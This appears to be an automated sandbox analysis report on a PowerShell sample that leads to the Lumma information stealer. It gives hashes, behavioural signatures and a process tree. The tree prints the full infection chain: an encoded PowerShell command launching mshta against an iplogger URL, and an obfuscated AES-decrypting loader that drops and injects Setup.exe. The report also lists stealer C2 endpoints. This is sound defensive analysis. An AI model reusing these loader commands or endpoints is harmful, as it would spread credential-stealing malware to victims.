Analysis
-
max time kernel
94s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/09/2024, 13:12
Static task
static1
Behavioral task
behavioral1
Sample
9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps1
Resource
win7-20240903-en
General
-
Target
9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps1
-
Size
131B
-
MD5
5af4a5a13fc361303f37483b171c1c65
-
SHA1
8d0052f96c26ef0117455de45e15b311d4946f75
-
SHA256
9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855
-
SHA512
85221585c7851b780c5fa5d39ab3cd9f09e3d9b6c4b29ac1bdf7fac94ce772488c3b5605ea38cf691e6d076f430b10f65be38bcc74387d70aeb7c60147bb61a8
Malware Config
Extracted
https://iplogger.co/2vJ7b7
Extracted
lumma
https://dairyucoemwk.shop/api
https://condedqpwqm.shop/api
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 8 1284 mshta.exe 10 1284 mshta.exe 12 1284 mshta.exe 21 4216 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 788 Setup.exe -
Loads dropped DLL 2 IoCs
pid Process 788 Setup.exe 2052 LarkManger.a3x -
pid Process 320 powershell.exe 4744 powershell.exe 4216 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 788 set thread context of 452 788 Setup.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4744 2052 WerFault.exe 109 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LarkManger.a3x Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 320 powershell.exe 320 powershell.exe 4744 powershell.exe 4744 powershell.exe 4216 powershell.exe 4216 powershell.exe 788 Setup.exe 788 Setup.exe 452 more.com 452 more.com -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 788 Setup.exe 452 more.com -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 320 wrote to memory of 4744 320 powershell.exe 84 PID 320 wrote to memory of 4744 320 powershell.exe 84 PID 4744 wrote to memory of 1284 4744 powershell.exe 85 PID 4744 wrote to memory of 1284 4744 powershell.exe 85 PID 1284 wrote to memory of 4216 1284 mshta.exe 86 PID 1284 wrote to memory of 4216 1284 mshta.exe 86 PID 4216 wrote to memory of 788 4216 powershell.exe 103 PID 4216 wrote to memory of 788 4216 powershell.exe 103 PID 4216 wrote to memory of 788 4216 powershell.exe 103 PID 788 wrote to memory of 452 788 Setup.exe 104 PID 788 wrote to memory of 452 788 Setup.exe 104 PID 788 wrote to memory of 452 788 Setup.exe 104 PID 788 wrote to memory of 452 788 Setup.exe 104 PID 452 wrote to memory of 2052 452 more.com 109 PID 452 wrote to memory of 2052 452 more.com 109 PID 452 wrote to memory of 2052 452 more.com 109 PID 452 wrote to memory of 2052 452 more.com 109
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAGMAbwAvADIAdgBKADcAYgA3AA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://iplogger.co/2vJ7b73⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function iXIQXG($tvnOyfW){return -split ($tvnOyfW -replace '..', '0x$& ')};$kQFqNP = iXIQXG('C9F2793CB7769DE8EE92CC187747074745E3EA3043439C3196B18B2757689F43B821EA6C49193515DC2E82AD9551B8DA597D522159538BB47FDF58446356ED06AFD674F314AEBB1BCBB8B389A09A43537B6EF98A06D7EEAB3A4E5E71391C3FEDF5F90DB240D8258DE9EB1795D4F48833745D4D417EAD9B69112F5FF18835196FD76257367BC2D600D96AA785829B201DE2986A042D1AD6B5FE167598B3DE3CC06180EC8FB0CB078EBFAD4C02221A5FB30D17D9D25C70AC71809D797C0245B5F8CABBAE2178CEDEBD2D7EC56CA0C178E4EB48D65D4285F9AECEFFCDF20CA74CA31E806F785A4244E9B42ADF61A64A9C3CE875961A8754175DE272D455C84FD1DBB61AF31269275952C62DABD14F6074953F666D2D5E0FD47BF227BA835960D619ACEC649153EE52D42A760B5362C0221A6D1C084DD374A748C78EF4B9DCF67A1CEFD1A222476998D564E00D98E3FF7CA037D2E853780AD9DC54287D64D014A75BAAAE84F8BAE53E72CE9AB1C55353098D4EDA82F50FC9ADC08BDB53F14383679E795A9E44A1D5A16F1CB93DA991822AD642FBBEC06E60DEB14E23EDB5F1CA02CDA7D36F3C5AE9CD89CC7B97618682D05CB82A1A7C2C40BF22DCB2EFAB9E028C0E687EEDB4E09E58768AF9C435821A6A745E1B42D453BA2F591C1225D048542D082E0840C14AAF7669195909D670B9AF8AB9CC70CE0AEF64655E2B09C8A41D09522373BB3C3850035CF63F0D0E987F14B5DFF25D614BD2BF1BCCE9600E0D2C0C6E98AD925CE73A81802803EE751B8362A72E80C4A7CE6D0961DA1C5E346A1B0C427FFA73444F91B06E5AD38B4EC4B9569BC84CC33C8BCB1E7E7B6E9C4C2B59B60482411C849227A8F93C2EEF8B56805DE728C239BD77B408FDCF1C3CFB7EEA1781F6B1D73F8865F212F5F7FBD08E27F6C06D94F096325A9092CE310925BCE43C8E02A9C3AE9E757F1DF657E24EE9C638FF1D348BB7CB1BF85603E8E7854B9E5170960F941780BBF18D793FD32FD6F59DF06CF294A907ACEA1D0518FFAA6A437D8EB26A69877ACC6515B87BBB76404D73AE6B9669DD740C912D1077C73B9D60CE15C24DB50454441730E4BA62DBAF14A2A2F7628B0EA85CD1B4BE48B76F46B4370445DC50F9DFADBA3530B30C788E848AFA455F8B65A42DC59AD970D65D36133AFBD6F44085DE216AA4E84977AC231E8554BBF8DF0E0E65593E094B323F42F3717AD9E4F6C81BB0829860308F18E1C2F92CEFF64B637157C7DD2B706B3817EAB68C0ACD89B81A37437F2220C394F99D56AEB23566D1D1A3D89EA0E2DDF99DAE2AB169799851B72D174076E98344909FAAD644910164C3338D23875E6F759AC54C260B9057D42351C7F82AFEF5A0068557288353343026D1C957374105161CF024965EEAC69185C6B963E102AD8D548121923C49EC3AAEF113E099C0E164C7EFE464199F58334D35EE85F26820F9060B8D06FC20B255A124A671A73B5A1CADF2514E906E140A7390CFD0FEBEE41E9163FD65368105A233DB8D4D9A66D6404226FDE4F4E0C86ED34355FE957618FF32BA29898B0E8857603D4CE47A2D0159F44A6C59845F4063325CFE737B538B10EF7357B6227BEB16DA7D69FC4374E35BFAA069B91BA79B32000C05DC625A0B2A32B1F9A83CED6271FFC07729E9572F835578FFB8410ED2518B246D83B0834094C34FC68C53478228858D5B14D6963B99FDC3DD615A3C5EE38440B3A13B34FA7349F53F8AEB12EDB0ACED2949A18F74E6A80BD57A959246CE42267D922C69426620DBC59841707BC20994ECB84361B763F7607003699FF9C7F08C1448D6BB003E18D055D441F4E91A142418A51EB4C0FD2E1054FA');$hRQJT = [System.Security.Cryptography.Aes]::Create();$hRQJT.Key = iXIQXG('4D5754704F764A527165755858615A58');$hRQJT.IV = New-Object byte[] 16;$ymWKAgnI = $hRQJT.CreateDecryptor();$GNhLuFfFx = $ymWKAgnI.TransformFinalBlock($kQFqNP, 0, $kQFqNP.Length);$WVrcoNzKK = [System.Text.Encoding]::Utf8.GetString($GNhLuFfFx);$ymWKAgnI.Dispose();& $WVrcoNzKK.Substring(0,3) $WVrcoNzKK.Substring(3)4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Users\Admin\AppData\Local\Temp\LarkManger.a3xC:\Users\Admin\AppData\Local\Temp\LarkManger.a3x7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 13768⤵
- Program crash
PID:4744
-
-
-
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 2052 -ip 20521⤵PID:4780
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
921KB
MD53f58a517f1f4796225137e7659ad2adb
SHA1e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA2561da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634
-
Filesize
2.2MB
MD5d9530ecee42acccfd3871672a511bc9e
SHA189b4d2406f1294bd699ef231a4def5f495f12778
SHA25681e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280
SHA512d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
71KB
MD534c206a2d14137066f458912bdf7b16b
SHA16ce3c3f51697c475e2eba5ad0c2b6b33b8c7b818
SHA256127c13e44fb045fd308805075efb8b545ac67551f92935ef7c84187701d14792
SHA5121b7d4a55de6a1c2656d2490734a0d684b519cbef136f3ae97b87f9092407c13d0b2a8b2dd3bf9bad8ec339b02eeedcbe7dba9d404dce599051f507e3771da252
-
Filesize
2.0MB
MD574adf741c2cc8d1b509fd48d6ec4d36c
SHA1e044dbf4d97cee28ba107c8ef42ddbd6463206fa
SHA2567ba7b50bbc3365d58f43d70db646e218ce87dbb5c91ab701c1fbbdc7ff6ee98e
SHA512db41aa3fc4d739a273835f1c26fe3076d9a5dfd864096387f4e18991fe0bdf3fd6c765504dc327e6e697bbe645c468bbe8a5bce20564ec2d7dbf9f6cf105920c
-
Filesize
1.9MB
MD5989fafc41d9d53e6b0dd1a29da287ee2
SHA13af440d66a27c8f1d90ce198c7f3016775c13edb
SHA2560c9d304469d274d082a4b1675f4701edc8a8dd2177817f220f633ae32f4b60e5
SHA512253238cb1738c187aee2877f5159ee18d9ba1718495d5ae54ed84d9de369c2eebc97842c15a926aba46813051bb831fd9bf68e3cb5b33751f503bf321d19ce57
-
Filesize
1.4MB
MD5612336b41291dd4855d77d3ba228e527
SHA14f1aed3cb2bac4f62ec672b78ac7f829ab5c01c7
SHA256a0579a6d6471adb6b10420a823fa264e61b8a269d69b6193d97e71c66c6af1a6
SHA51235da1708cb649986440364b2ee8577a720561d88de3e02745b6fa5a741da996fb4f5f9dd9e46b004c60f7e180e3830122f3535318bdac95b2a07312070a80d81
-
Filesize
124KB
MD5209974550cc2a835f1879995851b424a
SHA1f09850b9e7fffce197e362b9562cd0ff1c5c71ed
SHA256ca440d0128b62e35333730c5925992ae5b4b05a37c10105a9145eb5cf7a77071
SHA5124ab857adeab0e45f03868d1208d8f3250bbe27c5854bbc885e94e7e6ed8bcf9bdb2ff5035bebb1958b345ecadf244dcc433d760643ea544066b32f3f1e266276
-
Filesize
206KB
MD5fa034eb13d21ce4e9fc2d3eafdf40cd2
SHA10992d91706d26b6cc2ff64d899308ba4e9380a35
SHA2561ca6a0546f9627fa9ba3d377d79a21ff26ec9b349d47247c9b241a70728d0699
SHA5124f8024f43a70d9d8ae67848e2540b028cf1b9183b7dedd66043fb16394601da986d695c8d28f072444a69c1b2639c8b79096065389069fb854d152db166ed734
-
Filesize
99KB
MD5624bce9b02382312f4588d3147b738a3
SHA18df16c75c9e86a96d9f2b11e80eb182ba6c8eef9
SHA25664e531e46cf5b644d1b7f1df885efcf51a65db50fab65ab250f5e4e1adfa9d29
SHA512e74e56210cb3c184499de4e0d9e57e8ee9d7314b93fb1a97030a3397cc47b91ec74c704b25fc4bd16f4c7680240ae1d39d69cd9f024dd52c90eae9cc6c53b6ae
-
Filesize
106KB
MD5ca8a821ff5a6b848c5a170ff9a97bb39
SHA1a98b91fa29848013cef021ec8b3a29979cac0c65
SHA256fdd99d667419612bf98200783e0ccf0f7c11913ca03ca162d72d43f6861e5478
SHA512e475a09e1f9f740b6c36c9b33b20f263896b869d8ac58848504db29903a9597b84761b9c3918addc9c726d4429a0f496f44e3a8b0cce9a3008d071a5d46bb5c6
-
Filesize
145KB
MD54e7db89a9f5c07a295de43b745e5658b
SHA13f24cbc02d130ed156f1b4c57dc951a9238dc8ef
SHA2564c0b4273dc4103c666ff01ed8b9db995f68c5c178973465bb25cd5cdf99ef01a
SHA512c4117d50e2b966345ff86aade385552915ba41bb176fcdcd402fb54949377f00d17eea384ec90df2e3db92354198ce600131b7609eedf108f7b919d5ba330611
-
Filesize
148KB
MD570bb1c831327b26e4dd74097f59a55b0
SHA146cf431d19bff9646ae6c6fd0c57e25664178d14
SHA256776db47dd91bce8bc813a54a815be3e73b6e58e9fe5f24db7bf0d8c06a240f6a
SHA5128f78d18e15ee86b801cb49ee4ee7f5dc06f9730181b849ede944c5d922f7c7ab5814d7879399a712e8bb56b1878011552b6a667a6b8dccef6c6be3f236c3f44a
-
Filesize
93KB
MD5c865b2cab8dd25682b40006832a4b604
SHA10722c7157c96eff7a4ac85a113cf21c4d0e27b1f
SHA256528e453ee8fd16b6e2066b5417b115504cd31afc4ffbd79206369c747caad1fe
SHA5128eb3dbff515e18f481f62e8f3ac17ea7674ea8adf0c37b0bb2c5da6c9914b9376a8dac35f2e004a313fc5f2507e7200bfcc3b5973ae428df147d93b26ed3965b
-
Filesize
103KB
MD560d50ee0763200548c9df4b4bc712cd1
SHA1206f9cd895936fd7f597b72446c529881cde9829
SHA256500906ac9cab570726fe2c3c819eec3f88cb69f326857920d8423883c222c773
SHA512f59a30f34eab4bec57b6e5d3e53e0b13b74db64f50a9d7b33c9a6fad63de3a80a2436fe8483355d3632fabbc613e1aeb38a3792c4296773fbe50e23ba1e7dee5
-
Filesize
109KB
MD5b5bce917fb4d322dad4b26febaaef09f
SHA1891fd73ba1c70be635772386e4bf3cb13496fb59
SHA2560ddb18e05d4a58c010a42207af0ffdfaf12f9bee29f6971459bd69fdf26b0e79
SHA512a795e60a2197f4a2f9644e2b4c96635472e270274e991cc1130edc64e112f2d527577ff3b7bf7539fc62e724687f82330bc59e3adeaeb37000a60dcd4e503425
-
Filesize
199KB
MD5b0b1b848ceafcaf9e0dcde8bcf7492d8
SHA139e929ebc69acc4c6610b9c3382c49a376ac9052
SHA2565a23541ce618f91b78a809fe91a0c68681e20018c4411e00d8c205ab1d850dbf
SHA5127ac783936a15c1313dd7a68961ee98e4d351b60d3ef1e5bd89ef02456145fcca5147884038950a8b9ed0de7ed37ed6f3c2ce9b82de5e3a426ec7e5e918e5b2c7
-
Filesize
91KB
MD5c26b55aa25d424653e75ac278b0bca42
SHA1fb49a3940c6380d6af38a82c95ca56cd3aefbeab
SHA25603e35e4c8d682d80ebde0492ba01d5a922766daf70df6cb2a22a5a5365adff1e
SHA512b701aee8c2d2490309c902cf152ea118d90429caabfef4774802319871bec4c94fe41d5a305d6df7b698ca051b21332a7422a63777470d781c70100ff758726f
-
Filesize
107KB
MD56b4c975b9a0b31fa4c0f8818ec53942c
SHA1dcc10f3758945824b092d071424f9ecb413a353c
SHA25670996649507cc815f0c4886f8c4822d45c5e201e8e41dc464ab4973ea19d8a23
SHA5124ad012581c3853d944152519202e1df67dbfee2fa752c3114da5bf8cb6653f1cb093d5bf951795990a0e0e5d16c8375ab99074cafecbce518ab83ddaa30d2dd9
-
Filesize
107KB
MD52ac1161c66a47bb69378559c2c6fb44d
SHA1a1e28a5ae021fe5cbf57ed7e6e7177114421bfa6
SHA256605d916a697824c4ad6c418d6e7cc157b85825da5dc08a0716d89c56bef0a6fc
SHA5122e5a9d0ed020447e6482feed0770c7f1f12118591c7412b4bb796a2219b9977632cfcef16faa0f28064d8b19c2dafc4fd2cae929d57bdabd37702152fa850855